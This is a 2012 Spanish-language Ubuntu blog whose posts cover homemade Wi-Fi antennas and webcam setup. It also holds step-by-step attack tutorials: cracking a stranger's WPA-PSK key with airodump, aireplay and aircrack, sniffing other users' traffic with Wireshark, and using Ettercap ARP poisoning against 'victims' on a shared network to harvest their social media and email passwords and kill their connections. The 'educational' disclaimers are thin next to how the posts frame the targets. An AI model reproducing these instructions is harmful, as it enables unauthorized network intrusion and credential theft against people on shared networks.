miércoles, 19 de septiembre de 2012

Comandos equivalentes


Windows Ubuntu
Internet ipconfig iwconfig
Exploración cd ubicación cd ubicación
Eliminardel nombrearchivorm nombrearchivo
Copiarcopy nombrearchivocp nombrearchivo



jueves, 13 de septiembre de 2012

Antenas Caseras

Hola a todos de nuevo, después de tanto sin escribir buscando más ideas que poder poner en el blog pensé en una nueva que anda circulando por internet, por seguridadwireless, una de la web más conocida con respecto a este tema. Pues en este post comentaré el aspecto de las antenas "caseras" aquellas que podemos construir con materiales que son baratos y fáciles de conseguir o que tengamos por casa. Lo que conseguiremos con estas antenas será ampliar la señal de nuestro receptor usb wifi.

Antena doble pringles

La primera de todas es la más famosa por su simplicidad.
Se llama la cantenna, o como la llamo yo el torpedo pringles. Cada uno a su gusto, consiste en juntar dos latas de pringles grandes.


Este sería el resultado final.

Ahora procederé a explicar lo que necesitamos:

-2 latas de pringles 165g
-Cinta aislante
-Tijeras
-16 Arandelas pequeñas (3mm diametro interior)
-32 Arandelas grandes (6mm diametro interior)
-32 Tuercas (3mm diametro interior)
-Una barra roscada (50cm longitud 3mm diámetro)

*Excepeción: Puedes añadirle al final del todo dos discos recubiertos con cinta de aluminio o papel de aluminio, mejor la cinta. En caso de que lo añadas:
-Cinta de aluminio
-Dos discos que no sirvan, uno se recortara mas o menos por la mitad.


Primero de todo cogemos la barra roscada de 50 cm, y marcamos con un permanente cada 3 cm, para guiarnos y poner las arandelas.
Luego recortaremos dos circulos, uno de carton, cartulina, de las cajas de cereales por ejemplo, y lo ponemos como base, y el otro de plastico, de una de las tapas de las latas.
Cuando hayamos colocado 6 arandelas grandes, es decir a la séptima ponemos el circulo de plástico, luego ya seguimos colocando hasta otras 6, y en la sexta ponemos la tapa SIN RECORTAR de la lata para poder cerrar bien nuestra antena. 

*Los discos ya si queréis colocarlos es primero uno entero y luego el recortado, con el mismo criterio que siempre, yo lo que hice para que cerrara bien fue colocarles dos arandelas grandes pegandolas al disco y asi no se movían.

Falta hacer un pequeño agujero mas o menos cerca de donde se encuentre la base para meter el pincho usb y que no llegue a tocar la barra metalica, solo rozarla.



Antena escurridor de aceite.

Para mí esta es la mejor y con la que mejores resultados he obtenido. Y es la más sencilla de hacer.
Materiales:
-Colador
-Rosca y 2 tuercas de manguera de jardín
-Cable usb macho-hembra


De diametro mide 30 cm.
Hay que agujerear el centro del colador
Partimos por la mitad la rosca para meter el cable y lo ponemos en el agujero del colador.
Metemos con cuidado las tuercas y dejamos que el extremo de cable hembra sobresalga un poco pero sin llegar a pasarla y enroscamos bien para que se quede fijo. La otra rosca tiene qe pasar entera.







domingo, 29 de abril de 2012

NUEVO UBUNTU

Bueno Ubuntu 12.04 ya esta aquí, a partir d ahora hablaré de la nueva versión de esta distribución.

jueves, 29 de marzo de 2012

Sacar WPA Ubuntu

Bueno ya hice en su día una etrada donde explicaba como sacar la WEP de una red, en este post me encargaré de explicaros como sacar una WPA-PSK, tiene que ser PSK, el por qué, pues muy sencillo las PSK, significa Pre-shared-key, osea "clave compartida" ya que las puedes sacar mediante fuerza bruta o un diccionario


Mejor que las saques por diccionario, tienes muchas aplicaciones en ubuntu para crear diccionarios como crunch, wpamagickey...


Bueno comencemos:


sudo airmon-ng start wlan0
sudo airodump-ng mon0
Eliges la red que más te guste con WPA-PSK y te fijas en la MAC, y el canal y guardas con un nombre:


sudo airodump-ng --bssid 11:22:33:44:55:66 -c numero -w captura mon0
Comenzará a escanear esa red, y tiene que haber alguien conectado sino no servirá de nada.
El cliente se llamará -c.
En otra pestaña escribimos:


sudo aireplay-ng -1 10 -b 11:22:33:44:55:66 -c DD:FF:GG:JJ:GG:TT -h TUMAC mon0


Cuando consiga el handshake, ya tendrmos la información, solo tienes que usar el diccionario y listo:


sudo aircrack-ng captura-01.cap -w rutadiccionario


Y ya está si tenemos un buen diccionario sacará dicha clave.




No me responsabilizo de lo que se haga con este tutorial.







Wireshark

Bien, en esta etrada os enseñaré a manejar el wireshark, este programa, se encarga de ver el tráfico que circula por nuestra red, es algo similar al ettercap.
Bueno pues primero de todo instalad el wireshark, por consola o mediante el catalogo de software.
Una vez instalado lo ejecutamos como root, ya que sino no podremos capturar paquetes.
sudo wireshark
Buen ahora elegiremos la interfaz que capturará paquetes, si no quieres complicarte dale a la que captura en todas.
Cuando le déis a iniciar os saldrá una imagen similar a ésta:




Para ver las páginas web que está visitando tu red escribid "http" como filtro y os saldrán las páginas web que se están visitando.
Fijaos que en la parte de abajo hay una pequeña ventana con signos raros y números, pues bien ese es el filtro de esa página web si lo tiene, es decir que si no tiene filtro ni protección ni nada, podréis saber con quién está conversando esa persona a través de la conocida red social "tuenti" por ejemplo, o cosas similares.
Se pueden hacer muchas más cosas, como por ejemplo ver si hay tráfico con el correo electrónico, con algún chat, cliente de mensajería instantánea, sacar claves WEP mediante la inyección de paquetes, pero eso lo explicaré en otra entrada, esto solo es una breve introducción al wireshark, para que vayáis familiarizándoos con él.


Recordad también que esto es solo un tutorial con fines educativos, no me responsabilizo de lo que cada uno haga con lo aprendido.

sábado, 25 de febrero de 2012

Con cuidado en Ubuntu

Muchas veces en ubuntu al ser superusuario y estar trasteando con algunos archivos podemos cargarnos sin darnos cuenta algún archivo de configuración importante, o alguna carpeta o programa realmente importante, en esta entrada os daré algún consejo para que evitéis cometer esos fallos.
Lo primero que tenéis que tener en cuenta es que si estáis trabajando por consola, fijaos muy bien en los nombres de las cosas que poneis, ya que si escrbís algo mal, y estáis haciendo limpieza de archivos binarios que insalastéis manualmente, por ejemplo, fijaos bien que ponéis el nombre del archivo binario y no la ubicación donde se encuentra, o a la hora de copiar escribid bien la carpeta de destino ya que os puede crear una carpeta no deseada.

Tuenti en Ubuntu


Bueno muchos hemos tenido problemas al usar complementos flash en ubuntu, con google chrome o con otros navegadores, a mi con firefox no me ocurria este pproblema, pero con chromium si, para solucionarlo, entráis en esta página y le tenéis que dar a permitir siempre en aquellos servicios que deséis permitir el control de vuestro microfono y vuestra webcam:

http://www.macromedia.com/support/documentation/en/flashplayer/help/settings_manager06.html



Luego ya reiniciais el navegador y ya os tendría que funcionar.


Webcam y microfono Ubuntu

Bueno como muchos sabréis a veces resulta una aventura configurar correctamente la webcam y el microfono en Ubuntu, pues bien, buscando en google, encontré varias soluciones, y ésta fue la que me funcionó a mí en todos los programas menos en el amsn, que aún no consigo configurar la webcam correctamente ni tampoco el micrófono.
Como la mayoría tenemos el sistema de ALSA o PulseAudio. Yo tenia el de pulseaudio, y para hacer funcionar todo hice lo siguiente:
Abres una terminal y escribes:

sudo apt-get install libasound2-plugins "pulseaudio-*" paman padevchooser paprefs pavucontrol pavumeter

Luego ya abres el programa y lo configuras a tu gusto. Y listo, ahora prueba los programas que usen la webcam y el microfono, y en seleccionar dispositivos tendras que buscarlos.

Esto se basa en ubuntu 10.04 y superiores.

sábado, 7 de enero de 2012

Uso del Ettercap


Vamos a usar el ettercap por consola, ya que el modo gráfico puede dar problemas:

sudo ettercap -C -i wlan0

***Nota: la i es la interfaz a la que te encuentres conectado, puede ser ath0, eth0, ....

Bueno comencemos, le dais manejandoos con el teclado, Sniff>Unified Sniffing
Ahora os saldrá un mensaje diciendo que la interfaz es la wlan0, la que pusimos anteriormente, le damos a INTRO y listo.
Ahora le damos a Hosts>Scan for Hosts
**Si os sale un mensaje de error, no os asustéis, intentadlo otra vez hasta que os salga alguno, os tiene que salir mas de 1, el router y los ordenadores conectados, el vuestro no aparecerá naturalmente.

Ahora cuando haya detectado algún Host, le dais a Hosts>Hosts List

Y ahora nos saldrá la lista de clientes conectados.
Para seleccionar las victimas, seleccionas los clientes con el teclado, y con la tecla 1 seleccionais los ORDENADORES, y con la tecla 2 el router, el router suele tener la IP 192.168.1.1, los otros serán los ordenadores, lo que nos interesa.

Ahora comencemos, una vez los hayas seleccionado, le dais a Mitm>Arp poisoning
A esto se le llama ataque de hombre en medio.
Luego le dais a Start>Start Sniffing
Y nada ahra a esperar, si queréis ver por ejemplo  las páginas a las que nuestro amigo se conecta, le dais a Plugins>Manage the plugins
y buscáis el remote_browser, lo activáis con INTRO, y ahora volved a hacer lo del Mitm, y el Sniffing para que lo cargue correctamente, bien ahora e dais a View>Connections
y os saldra una lista enorme con las IP de los ordenadores seleccionados, las que pongan active son las que está viendo en el momento, pero ahora lo interesante, donde pone User message, nos fijamos que van apareciendo mensajes, entonces imaginaos que se conecta a Tuenti, Facebook, Gmail, hotmail.... o cualquier cosa, pues bien veréis una linea que ponga....
user: -------------- pass: ------------
y listo ya lo tenemos.

Bueno, además de sacar contraseñas y concienciarnos de a que redes nos conectamos y la inseguridad en internet, este programa sirve para muchas otras cosas, como por ejemplo no permitir que alguien conectado a esa misma red, se meta en una página en concreto, por ejemplo, nos encontramos en la parte de View>Connections.
Veremos que se va rellenando una lista, con direcciones IP, y al lado pone active/open/closed/opening/killed/idle una de esas opciones, pues si lo que queremos es terminar con una conexión en concreto, nos movemos hasta una que la opcion este en "active" y presionamos la tecla "K", y listo conexión matada. Para ver los detalles de esa conexión presionamos "D".

Este tutorial es didáctico, no me responsabilizo del uso que le de cada uno, recordad que la privacidad es un derecho, de todas formas con este método tan eficaz evitarás a los intrusos en tu red wifi, y podrás ver lo que hacen y dejan de hacer.

jueves, 5 de enero de 2012

Instalar Ettercap en Ubuntu

Aquí os explicaré como instalar y usar el ettercap para sacar el nombre de usuario y la contraseña de alguien conectado a la misma red que vosotros.

Primero tenemos que instalar las dependencias del ettercap, que no son pocas, por tanto en una consola escribimos:
sudo apt-get install build-essential 
sudo apt-get install linux-headers-`uname -r`

sudo apt-get install libpcre3-dev 
sudo apt-get install libpcap0.8-dev 
sudo apt-get install libnet1-dev 
sudo apt-get install openssl
sudo apt-get install libssl-dev 
sudo apt-get install ncurses-bin 
sudo apt-get install libncurses5-dev 
sudo apt-get install libnet6-1.3-dev 
sudo apt-get install libpthread-stubs0-dev 
sudo apt-get install zlib1g-dev 
sudo apt-get install libltdl-dev 
sudo apt-get install pango-graphite
sudo apt-get install pkg-config 
sudo apt-get install libpango1.0-dev 
sudo apt-get install libatk1.0-dev 
sudo apt-get install libgtk2.0-dev 

sudo apt-get install autoconf
sudo apt-get install byacc



***Nota: si alguna libreria no os aparece, buscadla en otro repositorio desde google, o más fácilmente con Y PPA Manager. Ver como instalar y-ppa-manager.
Ahora ya toca instalar el ettercap, yo lo hice desde los repositorios y me funciona perfectamente, oiréis que es mejor compilarlo a mano, pero a mi compilandolo a mano me fue peor.


sudo apt-get install ettercap-gtk ettercap-common


Una vez instalado tenemos que modificar una cosilla, así que en la consola escribimos:


sudo gedit /etc/etter.conf


Y buscamos una linea donde ponga algo de iptables, y borramos el "#" de la primera linea del iptables.


La linea quedará sin el #, una cosa así:


redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"


Y listo ya tenemos el ettercap listo para funcionar.

Para ejecutarlo:


sudo ettercap -C   (por consola)
sudo ettercap --gtk (interfaz gráfica)